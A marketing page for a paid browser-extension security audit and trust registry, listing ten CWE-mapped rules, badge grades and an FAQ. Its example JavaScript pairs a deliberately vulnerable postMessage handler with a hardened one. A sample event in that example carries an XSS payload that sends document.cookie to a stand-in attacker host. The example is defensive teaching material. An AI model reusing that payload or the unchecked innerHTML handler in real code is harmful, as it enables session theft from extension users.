Browser Extension Trust Registry

Browser Extension Trust Cert — certified in 48 hours

10 extension-specific security rules. Signed trust cert. Public registry listing. Enterprise IT teams use our registry as the source of truth for approved Chrome and Edge AI extensions.

Stanford Browser Extension Security Study (2024): 85% of the top-1,000 Chrome extensions request host-permissions beyond their stated purpose. Enterprise IT has no standardized way to verify an extension is safe — until now.

$499/yr registry listing · Chrome, Edge, Firefox · Badge for your Web Store listing · Prior art: SOC 2, Snyk

Extension Developer

Getting corporate IT inquiries?

When enterprise buyers ask "do you have a security audit?", the Extension Trust Cert is your answer. Put the gold badge on your Chrome Web Store listing. Close the sale.

$299 one-time audit · ships in 48 hours

Corporate IT / Security

Building an extension allowlist?

The Extension Trust Registry gives you an independent, citable security signal for your allowlist change request. Each cert is served from a verification JSON endpoint that returns the HMAC-authenticated certificate record (slug, store ID, audited version, score, grade, dates), so your tooling can compare it against the extension actually installed.

Free to search · machine-readable verification JSON

10 extension vulnerability rules

CWE mapped · Chrome Manifest V3 aligned · covers Chrome, Edge, Firefox

ext-001
Host-permission overreach · CRITICAL

CWE-272 · Permissions exceed declared purpose; wildcard patterns such as <all_urls> give the extension every origin the user visits

ext-002
DOM injection via message events · CRITICAL

CWE-79 · Unvalidated postMessage payload written to innerHTML

ext-003
Exfil to non-allowlisted hosts · CRITICAL

CWE-200 · Data sent to hosts outside the declared connect-src

ext-004
unsafe-eval CSP violation · HIGH

CWE-95 · eval() or new Function() in extension context; Manifest V3 refuses 'unsafe-eval' in the extension_pages CSP, so it survives only in MV2 manifests or sandboxed pages

ext-005
Remote code via dynamic script loading · CRITICAL

CWE-94 · Remote JS fetched and executed at runtime (script elements, importScripts), which the Chrome Web Store's MV3 policy prohibits as remotely hosted code

ext-006
Dangerous webRequest patterns · HIGH

CWE-441 · Request interception with mutation: blocking webRequest (MV2, or policy-installed MV3 extensions) and declarativeNetRequest redirect or header-modification rules

ext-007
Credentials in localStorage · HIGH

CWE-312 · Unencrypted sensitive data at rest; localStorage and chrome.storage.local are both readable from the profile directory on disk

ext-008
Message-passing without origin check · HIGH

CWE-346 · Missing event.origin validation on window messages, or missing sender checks on runtime.onMessage

ext-009
Tab capture without user consent · MEDIUM

CWE-862 · Screen/audio capture without a visible prompt or user gesture

ext-010
Update server not Google-hosted · MEDIUM

CWE-494 · Self-hosted update_url is a supply-chain risk: Web Store listings carry no update_url, so a manifest pointing at the developer's own server lets that server push new code to every install
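The ext-002 and ext-008 defects in one content-script handler, beside the hardened form, as an added example that is not code from the registry's rule engine or from any audited extension. The expected origin, the length cap, the element stub and the two sample events are constructed assumptions so the block runs under Node without a DOM; in the extension `panel` would come from `document.querySelector`.

```javascript
// Added example: vulnerable vs. hardened window 'message' handler.
// Any script in any frame of the page can call window.postMessage, so a listener
// must check event.origin and must treat event.data as data, never as markup.

const EXPECTED_ORIGIN = 'https://app.example.com'; // assumed: the only page origin this extension talks to
const MAX_TEXT = 4096;                               // assumed cap on payload length

// Minimal stand-in for an HTMLElement so the example runs without a browser.
function makeElementStub() {
  return { innerHTML: '', textContent: '' };
}

// Vulnerable: no origin check (ext-008), attacker-controlled string parsed as HTML (ext-002).
function vulnerableHandler(event, panel) {
  panel.innerHTML = '<div class="result">' + event.data.text + '</div>';
  return true; // accepted whatever arrived
}

// Hardened: origin pinned, message shape validated, payload rendered as text.
function hardenedHandler(event, panel) {
  if (event.origin !== EXPECTED_ORIGIN) return false;           // ext-008
  const msg = event.data;
  if (!msg || typeof msg !== 'object') return false;
  if (msg.type !== 'render' || typeof msg.text !== 'string') return false;
  if (msg.text.length > MAX_TEXT) return false;
  panel.textContent = msg.text;                                  // ext-002: data, not markup
  return true;
}

// Constructed sample events shaped like MessageEvent (origin + data only).
const HOSTILE_EVENT = {
  origin: 'https://attacker.example',
  data: { type: 'render', text: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">' },
};
const LEGIT_EVENT = {
  origin: EXPECTED_ORIGIN,
  data: { type: 'render', text: 'Summary: 3 open pull requests' },
};

function runDemo() {
  const v = makeElementStub();
  const h = makeElementStub();
  const h2 = makeElementStub();
  return {
    vulnerableAccepted: vulnerableHandler(HOSTILE_EVENT, v),
    vulnerableInjectedMarkup: v.innerHTML.includes('onerror='),
    hardenedRejectedHostile: hardenedHandler(HOSTILE_EVENT, h) === false && h.textContent === '',
    hardenedAcceptedLegit: hardenedHandler(LEGIT_EVENT, h2) === true && h2.textContent === LEGIT_EVENT.data.text,
  };
}

console.log(runDemo());
```

The same rule applies to `chrome.runtime.onMessage`: check `sender.id` against `chrome.runtime.id` (or the `externally_connectable` allowlist) before acting on a message, since a content script running in a hostile page is itself an untrusted sender.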

Trust badge grades

Score is calculated from weighted rule findings. Each finding includes remediation guidance.

Gold

90 or above

Zero critical or high findings at the audited version. Suitable for enterprise allowlisting of that version; a new release falls outside the audited scope until re-certified.

Silver

70 or above

No critical findings. Minor issues documented and tracked.

Bronze

50 or above

Critical findings present but mitigated with documented controls.

None

Below 50

Active critical findings with no mitigation. Listing published without badge.

Frequently asked questions

What does a browser extension security audit cover?

10 rules covering: host-permission overreach beyond stated purpose (ext-001), DOM injection via unvalidated message events (ext-002), data exfiltration to non-allowlisted hosts (ext-003), unsafe-eval CSP violation (ext-004), remote code execution via dynamic script loading (ext-005), dangerous webRequest/declarativeNetRequest patterns (ext-006), credential storage in unencrypted localStorage (ext-007), message-passing without origin validation (ext-008), tab capture without explicit user consent (ext-009), and update server not hosted on Google's update infrastructure (ext-010). Each rule is mapped to a CWE identifier.

How long does the extension audit take?

Static analysis of your extension manifest and source completes in under 15 minutes. You receive a signed certificate JSON and public registry listing within 48 hours after any manual review pass.

What does the trust certificate include?

A tamper-evident HMAC-SHA256 certificate record with: extension slug, Chrome Web Store ID (if applicable), version audited, security score (0–100), trust grade (gold/silver/bronze/none), issuance date and expiry date, served from a machine-readable endpoint at /api/extension-cert/{slug}. Because an HMAC is keyed and the key stays with the registry, enterprise IT tools do not check the MAC themselves; they fetch the record from that endpoint over TLS and compare it against the installed extension (same slug and store ID, same version, not expired, grade within policy). A version the cert does not name is uncertified until re-audited.

Why do corporate IT teams require a trust cert?

Stanford's 2024 browser extension security study found that 85% of top-1000 Chrome extensions request host-permissions beyond their stated purpose. IT security teams managing Chrome browser policies have no standardized third-party signal for extension safety — the Extension Trust Cert fills that gap. Each cert includes a signed verification JSON endpoint you can cite in an allowlist change request.

What badge grade will my extension receive?

Gold (score 90 or above): zero critical or high findings. Silver (score 70 or above): no critical findings, minor issues documented. Bronze (score 50 or above): critical findings present but mitigated with documented controls. None (score below 50): active critical findings with no mitigation — listing published without badge.

Corporate IT teams are building allowlists now

Security admins managing Chrome browser policies use our registry when evaluating which AI extensions to approve. Get your extension certified before they finalize the allowlist without you.

Submit Your Extension — $299

Contact [email protected] with your Chrome Web Store URL or GitHub repo.